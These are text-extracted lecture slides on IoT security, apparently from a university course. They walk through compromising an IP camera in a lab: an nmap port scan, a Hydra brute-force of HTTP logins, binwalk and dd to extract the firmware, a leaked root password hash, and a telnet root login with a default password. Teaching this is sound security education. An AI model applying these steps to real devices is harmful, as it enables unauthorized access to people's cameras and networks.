IoT Security · IoT Security x Internet of Things ... Alias IPCAM MAC 78 :A 5 :DD :08 : ... upnp .htm params _ backup .cgi ptz .htm ap .htm

Author: Prof Bill Buchanan

IoT Security Internet of Things

Computer Architecture

IP Camera Discovery


Web: Asecuritysite.com


IoT

Se

curi

ty

Introduction

Intr

oduction

IoT

Security

Traditional connecting of “things”


Computers: (Windows XP/7/8),

Mac OS X

Servers: (Windows 2008, Linux)

Wired connections

Internet

connection

Arc

hitectu

reIo

T S

ecu

rity

IoT


Servers (Linux, Windows 2008,

etc)

Computers: (Windows XP/7/8),

Mac OS X

CPU (Intel

x86, Intel

x64)

Eg 3GHz

Dynamic

Memory

(16GB)

Storage (1TB)

NVRAM

(4MB)

ROM

(24KB)

SDRAM

(256MB)

CPU (MIPS

24K V4.12

@384 MHz)

Embedded device

Features:

Highly secure.

Unique passwords.

No default passwords.

Firewalls/IDS/etc.

Auto patches.

Well tested.

NVRAM

(16GB)

ARM (Cortex-

A15 CPU -

ARMv7)/

Qualcomm

Snapdragon

(ARMv8)

Smart phone

1 2 3 4

ARMv7/ARMv8: Quad-core: 1.7GHz

Devices: Embedded OS


IoT

Se

curi

ty

Introduction to Computer

Architecture


IoT

Se

curi

ty

IP Camera

IP C

am

era

IoT

Se

cu

rity

IP Camera Architecture


Ralink MIPS

24K V4.12

384MHz

Linux version 2.6.21

Web

server

Telnetd

HTTP (80)

Telnet (23)

BusyBox

BIN

BusyBox (300 commands, L/W Linux))

Firmware (NVRAM)

Ethernet (DHCP)

IP C

am

era

IoT

Security


Ralink MIPS

24K V4.12

384MHz


Web

server

Telnetd

HTTP (80)

Telnet (23)

BusyBox

Ethernet (DHCP)

Device Status

Device Firmware Version 51.3.0.152

Device Embeded Web UI Version 0.0.1.6

Alias IPCAM

MAC 78:A5:DD:08:FC:DC

Wifi MAC 78:A5:DD:08:FC:DD

Method:

1. NMAP ports (192.168.0.2).

2. Try manual login (HTTP and Telnet).

3. Hydra login (HTTP and Telnet).

4. Kali – View BIN – binwalk 51.3.0.152.bin

5. Kali – Extract System - dd bs=1 skip=36 if=51.3.0.152.bin of=image.zip

6. Kali – unzip image.zip … review for Admin password

7. XSS Vulnerability.


IP C

am

era

IoT

Se

cu

rity


Ralink MIPS

24K V4.12

384MHz


Web

server

Telnetd

HTTP (80)

Telnet (23)

BusyBox

Ethernet (DHCP)

root@kali:~/system/system/bin# nmap 192.168.0.2

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-04 12:52 GMT

Nmap scan report for Unknown (192.168.0.2)

Host is up (0.0062s latency).

Not shown: 997 closed ports

PORT STATE SERVICE

23/tcp open telnet

80/tcp open http

8600/tcp open asterix

MAC Address: 78:A5:DD:08:FC:DC (Shenzhen Smarteye Digital Electronics Co.)

Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds


IP C

am

era

IoT

Se

cu

rity


Ralink MIPS

24K V4.12

384MHz


Web

server

Telnetd

HTTP (80)

Telnet (23)

BusyBox

Ethernet (DHCP)

billbuchanan@Bills-MacBook-Pro:~/webcam$ hydra -V -W 1 -t 1 -L user.txt -P

pass.txt 192.168.0.2 http

Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-01-04 12:59:18

[WARNING] The service http has been replaced with http-head and http-get, using by

default GET method. Same for https.

[WARNING] You must supply the web page as an additional option or via -m, default

path set to /

[DATA] 1 task, 1 server, 30 login tries (l:5/p:6), ~30 tries per task

[DATA] attacking service http-get on port 80

[ATTEMPT] target 192.168.0.2 - login "root" - pass "password" - 1 of 30 [child 0]

[ATTEMPT] target 192.168.0.2 - login "root" - pass "default" - 2 of 30 [child 0]

[ATTEMPT] target 192.168.0.2 - login "root" - pass "none" - 3 of 30 [child 0]

...

[ATTEMPT] target 192.168.0.2 - login "admin" - pass "123" - 16 of 30 [child 0]



[80][www] host: 192.168.0.2 login: admin password: 123456

[ATTEMPT] target 192.168.0.2 - login "user" - pass "password" - 19 of 30 [child 0]

[ATTEMPT] target 192.168.0.2 - login "user" - pass "default" - 20 of 30 [child 0]

[ATTEMPT] target 192.168.0.2 - login "user" - pass "none" - 21 of 30 [child 0]


IP C

am

era

IoT

Security


root@kali:~# binwalk 51.3.0.152.bin

DECIMAL HEX DESCRIPTION

-------------------------------------------------------------------------------------------------------------------

36 0x24 Zip archive data, at least v1.0 to extract, name: "system/"

101 0x65 Zip archive data, at least v1.0 to extract, name: "system/Wireless/"

175 0xAF Zip archive data, at least v1.0 to extract, name: "system/system/"

247 0xF7 Zip archive data, at least v1.0 to extract, name: "system/system/drivers/"

327 0x147 Zip archive data, at least v1.0 to extract, name: "system/system/bin/"

403 0x193 Zip archive data, at least v2.0 to extract, compressed size: 25717, uncompressed size: 108204, name: "system/

system/bin/daemon.v5.5"

26207 0x665F Zip archive data, at least v2.0 to extract, compressed size: 167785, uncompressed size: 685920, name: "system/

system/bin/mailx"

194073 0x2F619 Zip archive data, at least v2.0 to extract, compressed size: 238464, uncompressed size: 780068, name: "system/

system/bin/encoder"

432620 0x699EC Zip archive data, at least v2.0 to extract, compressed size: 3106, uncompressed size: 8372, name: "system/system/bin/

gmail_thread"

435814 0x6A666 Zip archive data, at least v2.0 to extract, compressed size: 3075, uncompressed size: 8260, name: "system/system/bin/

cmd_thread"

438975 0x6B2BF Zip archive data, at least v2.0 to extract, compressed size: 13149, uncompressed size: 45876, name: "system/system/

bin/ssmtp"

452205 0x6E66D Zip archive data, at least v2.0 to extract, compressed size: 24681, uncompressed size: 104800, name: "system/system/

bin/daemon.v5.3"

476973 0x7472D Zip archive data, at least v2.0 to extract, compressed size: 84641, uncompressed size: 170920, name: "system/system/

bin/unzip1"

561696 0x89220 Zip archive data, at least v2.0 to extract, compressed size: 15429, uncompressed size: 43616, name: "system/system/

bin/upnpc-static"

577213 0x8CEBD Zip archive data, at least v2.0 to extract, compressed size: 35607, uncompressed size: 95132, name: "system/system/

bin/ftp"

612899 0x95A23 Zip archive data, at least v1.0 to extract, name: "system/system/lib/"

612975 0x95A6F Zip archive data, at least v1.0 to extract, name: "system/www/"

613044 0x95AB4 Zip archive data, at least v1.0 to extract, name: "system/init/"

613114 0x95AFA Zip archive data, at least v2.0 to extract, compressed size: 99, uncompressed size: 203, name: "system/init/ipcam.sh"

615021 0x9626D End of Zip archive

Examining firmware

root@kali:~# cat daemon.v5.5

ps > /tmp/gps.txt/tmp/gps.txtrfopen failed

encoderreboot/system/system/bin/encoder &/etc/passwdwbroot:LSiuY7pOmZG2s:0:0:Adminstrator:/:/bin/sh/etc/

grouproot:x:0:adminsystem:%2x-%2x-%2x

this isn't system file

IP C

am

era

IoT

Security


Ralink MIPS

24K V4.12

384MHz


Web

server

Telnetd

HTTP (80)

Telnet (23)

BusyBox

Ethernet (DHCP)billbuchanan@Bills-MacBook-Pro:~/webcam$ telnet 192.168.0.2

Trying 192.168.0.2...

Connected to 192.168.0.2.

Escape character is '^]'.

(none) login: root

Password: 123456

BusyBox v1.12.1 (2012-11-16 09:58:14 CST) built-in shell (ash)

Enter 'help' for a list of built-in commands.

# ls

var tmp sys proc mnt lib home etc bin

usr system sbin param media init etc_ro dev

# cd system

# ls

system daemon Wireless init www

# cd www

# ls

mime.types config.htm ftp.htm

status.htm Deutsch jpeg.html

user.htm index1.htm snapshot.htm

traditional_chinese test_mail.htm alias.htm

ip.htm system-b.ini appversion.txt

french recordplay.htm sensordata.bin

upnp.htm params_backup.cgi ptz.htm

ap.htm multidev.htm recordsch.htm

IP Camera Telnet connection

IP C

am

era

IoT

Se

cu

rity



Ralink MIPS

24K V4.12

384MHz


Web

server

Telnetd

HTTP (80)

Telnet (23)

BusyBox

BIN

BusyBox (300 commands, L/W Linux))

Firmware (NVRAM)

Ethernet (DHCP)


IoT Security Internet of Things

Computer Architecture

IP Camera Discovery


Web: Asecuritysite.com

Documents

IoT Security · IoT Security x Internet of Things ... Alias IPCAM MAC 78 :A 5 :DD :08 : ... upnp .htm params _ backup .cgi ptz .htm ap .htm